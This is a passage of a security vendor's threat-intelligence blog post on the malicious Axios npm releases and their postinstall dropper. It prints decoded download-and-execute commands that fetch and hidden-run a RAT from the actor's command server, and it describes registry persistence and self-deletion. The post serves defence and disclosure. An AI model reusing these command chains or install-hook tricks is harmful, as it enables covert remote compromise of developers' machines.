{"id":60413,"date":"2026-04-01T21:00:00","date_gmt":"2026-04-01T21:00:00","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?p=146284"},"modified":"2026-04-01T21:00:00","modified_gmt":"2026-04-01T21:00:00","slug":"mitigating-the-axios-npm-supply-chain-compromise","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/","title":{"rendered":"Mitigating the Axios npm supply chain compromise"},"content":{"rendered":"<aside class=\"table-of-contents-block accordion wp-block-bloginabox-theme-table-of-contents\" id=\"accordion-85595b98-ddd8-4961-bee6-9e2f0a34e855\" data-bi-an=\"table-of-contents\"> <button class=\"btn btn-collapse\" type=\"button\" aria-expanded=\"true\" aria-controls=\"accordion-collapse-85595b98-ddd8-4961-bee6-9e2f0a34e855\"> <span class=\"table-of-contents-block__label\">In this article<\/span> <span class=\"table-of-contents-block__current\" aria-hidden=\"true\"><\/span> <svg class=\"table-of-contents-block__arrow\" aria-label=\"Toggle arrow\" width=\"18\" height=\"11\" viewBox=\"0 0 18 11\" fill=\"none\"> <path d=\"M15.7761 11L18 8.82043L9 0L0 8.82043L2.22394 11L9 4.35913L15.7761 11Z\" fill=\"currentColor\" \/> <\/svg> <\/button> <span class=\"table-of-contents-block__progress-bar\"><\/span><br \/>\n<\/aside>\n<p class=\"wp-block-paragraph\">On March 31, 2026, two new npm packages for updated versions of Axios, a popular HTTP client for JavaScript that simplifies making HTTP requests to a REST endpoint with over 70 million weekly downloads, were identified as malicious. These versions (1.14.1 and 0.30.4) were injected with a malicious dependency to download payloads from known actor command and control (C2). Microsoft Threat Intelligence has attributed this infrastructure and the Axios npm compromise to Sapphire Sleet, a North Korean state actor.<\/p>\n<p class=\"wp-block-paragraph\">Following successful connection to the malicious C2, a second-stage remote access trojan (RAT) payload was automatically deployed based on the operating system of the compromised device, including macOS, Windows, and Linux. This activity follows the pattern of recent high-profile <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/03\/24\/detecting-investigating-defending-against-trivy-supply-chain-compromise\/\">supply chain attacks<\/a>, where other adversaries poison widely adopted open-source frameworks and their distribution channels to achieve broad downstream impact.<\/p>\n<p class=\"wp-block-paragraph\">Users who have installed Axios version 1.14.1 or 0.30.4 should rotate their secrets and credentials immediately and downgrade to a safe version (1.14.0 or 0.30.3). Users should also follow the <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/04\/01\/mitigating-the-axios-npm-supply-chain-compromise\/#mitigation-and-protection-guidance\">mitigation and protection guidance<\/a> provided in this blog, including disabling auto-updates for Axios npm packages, since the malicious payload includes a hook that will continue to attempt to update.<\/p>\n<p class=\"wp-block-paragraph\">This blog shares Microsoft Threat Intelligence\u2019s findings from our analysis, <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/04\/01\/mitigating-the-axios-npm-supply-chain-compromise\/#microsoft-defender-detections\">Microsoft Defender detections<\/a> in place that alerted and protected our customers, additional protections we have implemented in our products to detect and block malicious components, and suggested mitigations for organizations to prevent further compromise.<\/p>\n<h2 class=\"wp-block-heading\" id=\"analysis-of-the-attack\">Analysis of the attack<\/h2>\n<p class=\"wp-block-paragraph\">On March 31, 2026, two malicious versions of Axios npm packages were released. These packages connected to a known malicious domain (C2) owned by Sapphire Sleet to retrieve a second-stage remote access trojan (RAT). Since Axios packages are commonly auto-updated, any projects with Axios versions higher than <em>axios@^1.14.0<\/em> or <em>axios@^0.30.0<\/em> connected to this Sapphire Sleet C2 upon installation and downloaded second-stage malware. Windows, macOS, and Linux systems are all targeted with platform-specific payloads.<\/p>\n<p class=\"wp-block-paragraph\">Microsoft Threat Intelligence has determined the account that created the <em>plain-crypto-js<\/em> package is associated with Sapphire Sleet infrastructure. That account has been disabled.<\/p>\n<h3 class=\"wp-block-heading\" id=\"silent-install-time-code-execution-using-dependency-insertion\">Silent install-time code execution using dependency insertion<\/h3>\n<p class=\"wp-block-paragraph\">The updated versions of Axios inject <em>plain-crypto-js@4.2.1<\/em>, a fake runtime dependency that executes automatically through post-install with no user interaction required. The trusted package\u2019s application logic is not modified; instead, the threat actor added a dependency that is never imported by the package\u2019s runtime code but only exists to trigger an install-time script to download the second-stage RAT. That means normal app behavior might remain unchanged while malicious activity occurs during npm installation or npm update on developer endpoints and continuous integration and continuous delivery (CI\/CD) systems.<\/p>\n<p class=\"wp-block-paragraph\">The dependency is seeded into a clean release (<em>plain-crypto-js@4.2.0<\/em>) to establish publishing history and reduce scrutiny. A follow\u2011up release adds the malicious install-time logic (<em>plain-crypto-js@4.2.1<\/em>), introducing an install hook that runs <em>node setup.js<\/em> and includes a clean manifest stub (<em>package.md<\/em>) intended for later replacement.&nbsp;<\/p>\n<p class=\"wp-block-paragraph\">Two Axios releases are then published with a surgical manifest-only change: <em>axios@1.14.1<\/em> and <em>axios@0.30.4<\/em> add <em>plain-crypto-js@^4.2.1<\/em> as a dependency while leaving Axios source code unchanged. The publication metadata differs from the project\u2019s normal CI-backed publishing pattern (for example, missing trusted publisher binding and missing corresponding repo tag\/commit trail for the malicious version).&nbsp;<\/p>\n<h3 class=\"wp-block-heading\" id=\"execution-on-compromised-environments\">Execution on compromised environments<\/h3>\n<p class=\"wp-block-paragraph\">The first-stage loader (<em>setup.js<\/em>) uses layered obfuscation to reconstruct sensitive strings (module names, platform identifiers, file paths, and command templates) at runtime. A developer or CI job runs <em>npm install axios<\/em> (or a dependency install\/update that resolves to the affected versions). The package manager resolves and installs the injected dependency (<em>plain-crypto-js@4.2.1<\/em>).&nbsp;<\/p>\n<p class=\"wp-block-paragraph\">During installation, the dependency\u2019s lifecycle script automatically launches <em>node setup.js<\/em> (no additional user step required), which decodes embedded strings at runtime, identifies the platform, and connects to <em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em> to fetch the next stage.&nbsp;<\/p>\n<h3 class=\"wp-block-heading\" id=\"single-endpoint-c2-with-os-specific-responses\">Single endpoint C2 with OS-specific responses<\/h3>\n<p class=\"wp-block-paragraph\">The package connects to a Sapphire Sleet-owned domain (<em>hxxp:\/\/sfrclak[.]com<\/em>), which fetches a second-stage payload from an actor-controlled server running on port 8000. The associated IP address (142.11.206[.]73) is tied to Hostwinds, a virtual private server (VPS) provider that Sapphire Sleet is known to commonly use when establishing C2.<\/p>\n<p class=\"wp-block-paragraph\">All platforms connect to the same resource over the same path (<em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em>), and the OS selection is conveyed through POST bodies <em>packages.npm.org\/product0|product1|product2<\/em>. This enables the operator to serve platform-specific payloads from one route while keeping the client-side logic minimal. On Windows, the malicious npm drops a VBScript stager. On macOS, the malicious npm package drops a native binary.<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">macOS: packages.npm.org\/product0&nbsp;<\/li>\n<li class=\"wp-block-list-item\">Windows: packages.npm.org\/product1&nbsp;<\/li>\n<li class=\"wp-block-list-item\">Linux\/other: packages.npm.org\/product2<\/li>\n<\/ul>\n<h3 class=\"wp-block-heading\" id=\"second-stage-delivery-and-execution-mechanics-by-os\">Second-stage delivery and execution mechanics by OS<\/h3>\n<h4 class=\"wp-block-heading\" id=\"macos-darwin\">macOS (Darwin)<\/h4>\n<p class=\"wp-block-paragraph\">On macOS, the RAT is identified as a native binary: <em>com.apple.act.mond<\/em>.<\/p>\n<p class=\"wp-block-paragraph\"><em>Setup<\/em><em>.js<\/em> writes an AppleScript into a temp location and runs it silently using <em>nohup osascript \u2026 &amp;<\/em>.&nbsp; AppleScript POSTs <em>packages.npm.org\/product0<\/em> to <em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em>, downloads a binary to <em>\/Library\/Caches\/com.apple.act.mond<\/em>, applies chmod 770, then starts it using <em>\/bin\/zsh<\/em> in the background.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nnode setup.js \u2514\u2500 sh -c 'curl -o \/Library\/Caches\/com.apple.act.mond\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\">The AppleScript is removed afterward; the durable artifact is typically <em>Library\/Caches\/com.apple.act.mond<\/em>.&nbsp;<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">SHA-256: 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a<\/li>\n<\/ul>\n<p class=\"wp-block-paragraph\">Observed macOS command (as decoded):<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"9\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nsh -c 'curl -o \/Library\/Caches\/com.apple.act.mond -d packages.npm.org\/product0 -s hxxp:\/\/sfrclak[.]com:8000\/6202033 &amp;&amp; chmod 770 \/Library\/Caches\/com.apple.act.mond &amp;&amp; \/bin\/zsh -c \"\/Library\/Caches\/com.apple.act.mond hxxp:\/\/sfrclak[.]com:8000\/6202033 &amp;\" &amp;&gt; \/dev\/null'\n<\/pre>\n<\/div>\n<h4 class=\"wp-block-heading\" id=\"windows\">Windows<\/h4>\n<p class=\"wp-block-paragraph\">On Windows, the RAT is identified as a PowerShell: <em>6202033.ps1<\/em>.<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">SHA-256: ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c<\/li>\n<li class=\"wp-block-list-item\">SHA-256: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101<\/li>\n<\/ul>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nnode.exe setup.js \u2190 npm post-install hook \u2514\u2500 drops: %TEMP%\\6202033.vbs \u2190 VBScript stager\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\">On first execution, the PowerShell RAT creates <em>%PROGRAMDATA%\\system.bat<\/em> and adds a registry run key at <em>HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate<\/em> to enable re-fetching of RAT after every reboot. This added registry run key can persist after reboot.<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">SHA-256: f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd<\/li>\n<\/ul>\n<p class=\"wp-block-paragraph\">The chain locates PowerShell (using <em>where powershell<\/em>) then copies and renames the PowerShell into <em>%PROGRAMDATA%\\wt.exe<\/em> (masquerading as a benign-looking executable name). It writes a VBScript in <em>%TEMP%<\/em> and runs it using <em>cscript \/\/nologo<\/em> to keep user-facing windows hidden.&nbsp;<\/p>\n<p class=\"wp-block-paragraph\">The VBScript launches hidden <em>cmd.exe<\/em> to POST <em>packages.npm.org\/product1<\/em> to <em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em>, saves the response to a <em>temp .ps1<\/em>, executes it with hidden window and execution-policy bypass, then deletes the <em>.ps1<\/em>.<\/p>\n<p class=\"wp-block-paragraph\">The temporary <em>.vbs<\/em> is also removed; the durable artifact is often <em>%PROGRAMDATA%\\wt.exe<\/em>.<\/p>\n<p class=\"wp-block-paragraph\">Observed Windows command (as decoded):<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"10\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title> \"cmd.exe\" \/c curl -s -X POST -d \"packages.npm.org\/product1\" \"hxxp:\/\/sfrclak[.]com:8000\/6202033\" &gt; \"C:\\Users\\<user>\\AppData\\Local\\Temp\\6202033.ps1\" &amp; \"C:\\ProgramData\\wt.exe\" -w hidden -ep bypass -file \"C:\\Users\\<user>\\AppData\\Local\\Temp\\6202033.ps1\" \"hxxp:\/\/sfrclak[.]com:8000\/6202033\" &amp; del \"C:\\Users\\<user>\\AppData\\Local\\Temp\\6202033.ps1\" \/f <\/user><\/user><\/user><\/pre>\n<\/div>\n<h4 class=\"wp-block-heading\" id=\"linux-others\">Linux\/others<\/h4>\n<p class=\"wp-block-paragraph\">On Linux, the RAT is identified as a Python payload: <em>ld.py.<\/em><\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">SHA-256: fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf&nbsp;<\/li>\n<\/ul>\n<p class=\"wp-block-paragraph\">A Python payload is written to <em>\/tmp\/ld.py<\/em> and launched detached using <em>nohup python3 \u2026 &amp;, suppressing output (&gt; \/dev\/null 2&gt;&amp;1)<\/em>.&nbsp;<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nnode setup.js \u2514\u2500 \/bin\/sh -c \"curl -o \/tmp\/ld.py\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\"><em>Setup.js<\/em> executes a shell one-liner to POST <em>packages.npm.org\/product2<\/em> to <em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em>.&nbsp;<\/p>\n<p class=\"wp-block-paragraph\">The response is saved as <em>\/tmp\/ld.py<\/em> and executed in the background using <em>nohup python3 \/tmp\/ld.py hxxp:\/\/sfrclak[.]com:8000\/6202033 \u2026 &amp;<\/em>.<\/p>\n<p class=\"wp-block-paragraph\"><em>\/tmp\/ld.py<\/em> remains a key on-disk indicator in typical flows.<\/p>\n<p class=\"wp-block-paragraph\">Observed Linux\/Unix command (as decoded):<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"8\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n\/bin\/sh -c \"curl -o \/tmp\/ld.py -d packages.npm.org\/product2 -s hxxp:\/\/sfrclak[.]com:8000\/6202033 &amp;&amp; nohup python3 \/tmp\/ld.py hxxp:\/\/sfrclak[.]com:8000\/6202033 &gt; \/dev\/null 2&gt;&amp;1 &amp;\" <\/pre>\n<\/div>\n<h3 class=\"wp-block-heading\" id=\"post-execution-defense-evasion\">Post-execution defense evasion<\/h3>\n<p class=\"wp-block-paragraph\">After launching the second-stage payload, the installer logic removes its own loader (<em>setup.js<\/em>) and removes the manifest (<em>package.json<\/em>) that contained the install trigger.<\/p>\n<p class=\"wp-block-paragraph\">It then renames <em>package.md<\/em> to <em>package.json<\/em>, leaving behind a clean-looking manifest to reduce the chance that post-incident inspection of <em>node_modules<\/em> reveals the original install hook.<\/p>\n<h3 class=\"wp-block-heading\" id=\"rat-deployment-as-covert-remote-management\">RAT deployment as covert remote management<\/h3>\n<p class=\"wp-block-paragraph\">The Windows RAT is a PowerShell script that functions as a covert remote management component designed to persist on Windows systems and maintain continuous contact with an external command server. When executed, it generates a unique host identifier, collects detailed system and hardware information (including OS version, boot time, installed hardware, and running processes), and establishes persistence by creating a hidden startup entry that re-launches the script at user sign in under the guise of a legitimate update process.<\/p>\n<p class=\"wp-block-paragraph\">The RAT communicates with the remote server using periodic, encoded HTTP POST requests that blend in with benign traffic patterns, initially sending host inventory and then polling for follow\u2011on instructions. Supported commands allow the remote threat actor to execute arbitrary PowerShell code, enumerate files and directories across the system, inject additional binary payloads directly into memory, or terminate execution on demand. To reduce forensic visibility, the script favors in\u2011memory execution, temporary files, and Base64\u2011encoded payloads, enabling flexible control of the compromised system while minimizing on\u2011disk artifacts.<\/p>\n<h3 class=\"wp-block-heading\" id=\"who-is-sapphire-sleet\">Who is Sapphire Sleet?<\/h3>\n<p class=\"wp-block-paragraph\">Sapphire Sleet is a North Korean state actor that has been active since at least March 2020. The threat actor focuses primarily on the finance sector, including cryptocurrency, venture capital, and blockchain organizations. These targets are often global, with a particular interest in the United States, as well as countries in Asia and the Middle East. The primary motivation of this actor is to steal cryptocurrency wallets to generate revenue, and target technology or intellectual property related to cryptocurrency trading and blockchain platforms.<\/p>\n<p class=\"wp-block-paragraph\">Sapphire Sleet often leverages social networking sites, such as LinkedIn, to initiate contact by directing users to click links, leading to malicious files hosted on attacker-controlled cloud storage services such as OneDrive or Google Drive, using domains masquerading as financial institutions like United States-based banks or cryptocurrency pages, and fraudulent meeting links that impersonate legitimate video conferencing applications, such as Zoom. Sapphire Sleet overlaps with activity tracked by other security vendors as UNC1069, STARDUST CHOLLIMA, Alluring Pisces, BlueNoroff, CageyChameleon, or CryptoCore.<\/p>\n<h2 class=\"wp-block-heading\" id=\"mitigation-and-protection-guidance\">Mitigation and protection guidance<\/h2>\n<p class=\"wp-block-paragraph\">In organizations where the security posture of npm packages might require review of updates prior to deployment, disabling auto-upgrade features is strongly encouraged. In <em>package.json<\/em>, <strong>remove use of caret (<\/strong><strong>^)<\/strong><strong> or tilde (~) <\/strong>which allow auto-upgrade of any minor or patch update up to a major version. Instead, use an exact version and handle upgrades manually.<\/p>\n<h3 class=\"wp-block-heading\" id=\"what-to-do-now-if-you-re-affected\">What to do now if you\u2019re affected<\/h3>\n<p class=\"wp-block-paragraph\">For organizations affected by this attack, Microsoft Threat Intelligence recommends the following steps:<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Roll back all deployments of Axios to safe versions (1.14.0 or 0.30.3 or earlier).<\/li>\n<li class=\"wp-block-list-item\">Use overrides to force pinned versions for transitive dependencies.<\/li>\n<li class=\"wp-block-list-item\">Flush the local cache with \u201c<em>npm cache clean \u2013force<\/em>\u201c.<\/li>\n<li class=\"wp-block-list-item\">Disable or restrict automated dependency bots for critical packages.<\/li>\n<li class=\"wp-block-list-item\">Adopt Trusted Publishing with OIDC to eliminate stored credentials.<\/li>\n<li class=\"wp-block-list-item\">Review your CI\/CD pipeline logs for any&nbsp;npm install&nbsp;executions that might have updated to axios@1.14.1&nbsp;or&nbsp;axios@0.30.4 or presence of <em>plain-crypto-js<\/em> in your <em>npm install \/ npm ci<\/em> outputs.<\/li>\n<li class=\"wp-block-list-item\">Look for outbound connections in network egress traffic to <em>sfrclak[.]com<\/em> or 142.11.206[.]72 on port 8000.<\/li>\n<li class=\"wp-block-list-item\">Developer machines: Search home directory for any&nbsp;<em>node_modules<\/em>&nbsp;folder containing&nbsp;<em>plain-crypto-js<\/em>&nbsp;or axios@1.14.1&nbsp;or&nbsp;axios@0.30.4.<\/li>\n<li class=\"wp-block-list-item\">Rotate all secrets and credentials that are exposed to compromised systems.<\/li>\n<li class=\"wp-block-list-item\">When possible, ignore postinstall scripts. If the scenario allows, use \u201c<em>npm ci \u2013ignore-scripts<\/em>\u201d to prevent postinstall hooks from running or disable postinstall scripts by default with \u201c<em>npm config set ignore-scripts true\u201d.<\/em><\/li>\n<li class=\"wp-block-list-item\">Remove all Axios files\/code from the victim systems and re-install cleanly.<\/li>\n<\/ul>\n<h3 class=\"wp-block-heading\" id=\"defending-against-the-axios-supply-chain-attack\">Defending against the Axios supply chain attack<\/h3>\n<p class=\"wp-block-paragraph\">Microsoft Threat Intelligence recommends the following mitigation measures to protect organizations against this threat.<\/p>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Fully stop Axios from being upgraded unless you explicitly choose to upgrade \u2013 In <em>package.json<\/em>, remove ^ or ~ (which allows auto-upgrade of any minor or patch update) and use an exact version. <em><u>NOTE: With this change, versions never upgrade unless you change them manually:<\/u><\/em><\/li>\n<\/ul>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n{ \"dependencies\": { \"axios\": \"1.14.0\" }\n}\n``\n<\/pre>\n<\/div>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Block Axios upgrades even if a transitive dependency tries \u2013 If Axios appears indirectly, force a version using overrides (npm \u2265 14). This forces all dependencies to use the pinned version, which is especially useful for security incidents. <em><u>NOTE: With this change, versions never upgrade unless you change them manually:<\/u><\/em><\/li>\n<\/ul>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n{ \"overrides\": { \"axios\": \"1.14.0\" }\n}\n``\n<\/pre>\n<\/div>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Disable automated dependency bots (such as Dependabot or Renovate) by disabling or restricting Axios updates in their config to prevent PR\u2011based auto\u2011updates, which are often mistaken for npm behavior:<\/li>\n<\/ul>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"7\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n# Dependabot example\nignore: - dependency-name: \"axios\"\n<\/pre>\n<\/div>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Check for malicious Axios versions in the organization to ensure that workflows and systems don\u2019t use compromised Axios versions (1.14.1 and 0.30.4).<\/li>\n<li class=\"wp-block-list-item\">Assess the potential blast radius from affected endpoints\n<ul>\n<li>The Exposure Management graph provides a unified representation of organizational assets and their relationships, including identities, endpoints, cloud resources and secrets.&nbsp; This graph is also exposed to customers through Advanced Hunting in Microsoft Defender, enabling programmatic exploration of these connections.<\/li>\n<\/ul>\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Using advanced hunting, security teams can query this graph to assess the potential blast radius of any given node, such as a server affected by the RAT. By understanding which assets are reachable through existing permissions and trust relationships, organizations can prioritize remediation of the most critical exposure paths.<\/li>\n<li class=\"wp-block-list-item\">Additional examples and query patterns are available here as well as in the hunting queries section.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h2 class=\"wp-block-heading\" id=\"microsoft-defender-detections\">Microsoft Defender detections<\/h2>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.microsoft.com\/security\/business\/microsoft-defender\">Microsoft Defender<\/a> customers can refer to the list of applicable detections below. Durable detections that were already in place alerted and protected customers from this attack. We have also released additional protections to detect and block specific malicious components.<\/p>\n<p class=\"wp-block-paragraph\">Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.<\/p>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"43.5\">\n<tr readability=\"5\">\n<td><strong>Tactic<\/strong>\u202f<\/td>\n<td><strong>Observed activity<\/strong><strong>\u202f<\/strong><\/td>\n<td><strong>Microsoft Defender coverage<\/strong>&nbsp;(Blocking&nbsp;detections&nbsp;are&nbsp;indicated where applicable and mapped to specific IoCs, components,&nbsp;or TTPs.)<\/td>\n<\/tr>\n<tr readability=\"7\">\n<td rowspan=\"4\">Initial Access, Execution<\/td>\n<td>The&nbsp;postinstall&nbsp;script downloads the payload from the attacker-controlled server.<\/td>\n<td><strong>Microsoft Defender for Cloud&nbsp;<\/strong><br \/>\u2013 Malicious Axios supply chain activity detected&nbsp;<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td>Initial execution script&nbsp;was&nbsp;included in&nbsp;<em>setup.js \u2013 plain-crypto-js-4.2.1.tgz<\/em>&nbsp;and&nbsp;is responsible for launching the malicious chain during install or first run<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong> <br \/>\u2013&nbsp;Trojan:Script\/SuspObfusRAT.A&nbsp;<br \/>(Blocking)<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td>Initial execution script&nbsp;<em>setup.js<\/em>&nbsp;was responsible for&nbsp;launching the malicious chain during install or first run<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong><br \/>\u2013 TrojanDownloader:JS\/Crosdomd.A (Blocking)<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td>Maliciously packaged crypto library&nbsp;<em>plain-crypto-js@4.2.1<\/em>&nbsp;used to execute or support attacker\u2011controlled logic in a supply\u2011chain compromise.&nbsp;&nbsp;<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong> <br \/>\u2013&nbsp;Trojan:JS\/AxioRAT.DA!MTB&nbsp;(Blocking)&nbsp; &nbsp;<\/td>\n<\/tr>\n<tr readability=\"8\">\n<td rowspan=\"2\">&nbsp; Execution (macOS)<\/td>\n<td>macOS persistence <em>artifact&nbsp;\/Library\/Caches\/com.apple.act.mond<\/em>&nbsp;launched, masquerading as a legitimate Apple&nbsp;component&nbsp;to&nbsp;maintain&nbsp;stealthy execution.&nbsp;&nbsp;<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong> <br \/>\u2013&nbsp;Trojan:MacOS\/Multiverze!rfn (Blocking)&nbsp; <br \/>\u2013&nbsp;Backdoor:MacOS\/TalonStrike.A!dha (Blocking)&nbsp; <br \/>\u2013&nbsp;Backdoor:MacOS\/Crosdomd.A (Blocking) <br \/>\u2013&nbsp;Behavior:MacOS\/SuspNukeSpedExec.B (Blocking) <br \/>\u2013&nbsp;Behavior:MacOS\/SuspiciousActivityGen.AE (Blocking)<\/td>\n<\/tr>\n<tr readability=\"7\">\n<td>Download and&nbsp;execution&nbsp;of payload&nbsp;&nbsp;<\/td>\n<td><strong>Microsoft Defender for Endpoint&nbsp;<\/strong><br \/>\u2013 Trojan:Script\/SuspObfusRAT.A (Blocking)&nbsp; <br \/>\u2013 Trojan:JS\/AxioRAT.DA!MTB (Blocking) <br \/>\u2013 Trojan:MacOS\/Multiverze!rfn (Blocking) <br \/>\u2013&nbsp;Behavior:MacOS\/SuspNukeSpedExec.B<br \/>\u2013&nbsp;Behavior:MacOS\/SuspiciousActivityGen.AE<br \/>\u2013&nbsp;Process launched in the background&nbsp; <br \/>\u2013&nbsp;Suspicious AppleScript activity&nbsp; <br \/>\u2013&nbsp;Suspicious script launched&nbsp; <br \/>\u2013&nbsp;Suspicious shell command execution&nbsp; <br \/>\u2013&nbsp;Suspicious file or content ingress&nbsp; <br \/>\u2013&nbsp;Executable permission added to file or directory&nbsp; <br \/>\u2013&nbsp;Suspicious file dropped and launched&nbsp;<\/td>\n<\/tr>\n<tr readability=\"10\">\n<td rowspan=\"2\">&nbsp; Execution (Linux)<\/td>\n<td>Download and execution of payload,&nbsp;<em>\/tmp\/ld.py<\/em>, a Python loader\/downloader used to fetch, decrypt, or launch&nbsp;additional&nbsp;malicious components.&nbsp;&nbsp;<\/td>\n<td><strong>Microsoft Defender for Endpoint&nbsp;<\/strong><br \/>\u2013&nbsp;Trojan:Python\/TalonStrike.C!dha (Blocking)<br \/>\u2013&nbsp;Backdoor:Python\/TalonStrike.C!dha (Blocking)<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td>Download and execution of payload<\/td>\n<td><strong>Microsoft Defender for Endpoint&nbsp;<\/strong><br \/>\u2013 Trojan:Python\/TalonStrike.C!dha (Blocking) <br \/>\u2013&nbsp;Process launched in the background&nbsp; <br \/>\u2013&nbsp;Suspicious communication with a remote target&nbsp;<\/td>\n<\/tr>\n<tr readability=\"12\">\n<td rowspan=\"2\">&nbsp; Execution (Windows)<\/td>\n<td>Observed artifacts,&nbsp;<em>6202033.ps1<\/em>&nbsp;and&nbsp;<em>system.bat<\/em>,&nbsp;provided&nbsp;attackers persistent remote access, command execution, and follow\u2011on payload delivery on Windows system&nbsp;&nbsp;<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong> <br \/>\u2013&nbsp;TrojanDownloader:PowerShell\/Powdow.VUE!MTB&nbsp;(Blocking) <br \/>\u2013&nbsp;Trojan:Win32\/Malgent&nbsp;(Blocking) <br \/>\u2013&nbsp;TrojanDownloader:PowerShell\/Crosdomd.B&nbsp;(Blocking) <br \/>\u2013&nbsp;TrojanDownloader:PowerShell\/Crosdomd.A&nbsp;(Blocking) <br \/>\u2013&nbsp;TrojanDownloader:BAT\/TalonStrike.F!dha&nbsp;(Blocking) <br \/>\u2013&nbsp;Backdoor:PowerShell\/TalonStrike.B!dha&nbsp;(Blocking)<\/td>\n<\/tr>\n<tr readability=\"8\">\n<td>Download and execution of payload, <em>6202033.ps1.<\/em><\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong> <br \/>\u2013&nbsp;TrojanDownloader:PowerShell\/Powdow.VUE!MTB (Blocking)&nbsp;&nbsp; &nbsp;<br \/>\u2013 Trojan:Win32\/Malgent (Blocking) <br \/>\u2013 Behavior:Win32\/PSMasquerade.A&nbsp;<br \/>\u2013 Suspicious ASEP via registry key&nbsp;<br \/>\u2013 System executable renamed and launched <br \/>\u2013 Possible&nbsp;initial&nbsp;access from an emerging threat&nbsp;<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td>Defense&nbsp;evasion&nbsp;(macOS)<\/td>\n<td>Removal of indicators<\/td>\n<td><strong>Microsoft Defender for Endpoint&nbsp;<\/strong><br \/>\u2013 Suspicious path deletion<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td>Command and&nbsp;control<\/td>\n<td>Use of the following network indicators for C2 communications:&nbsp;<br \/>C2 domain:&nbsp;<em>sfrclak[.]com<\/em> C2 IP:&nbsp;142.11.206[.]73 C2 URL:&nbsp;<em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em><\/td>\n<td><strong>Microsoft Defender for Endpoint network protection <\/strong>and<strong> Microsoft Defender SmartScreen<\/strong> block malicious network&nbsp;indicators&nbsp;observed&nbsp;in the attack.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h2 class=\"wp-block-heading\" id=\"indicators-of-compromise\">Indicators of compromise<\/h2>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"16.5\">\n<tr>\n<td><strong>Indicator<\/strong><\/td>\n<td><strong>Type<\/strong><\/td>\n<td><strong>Description<\/strong><\/td>\n<\/tr>\n<tr 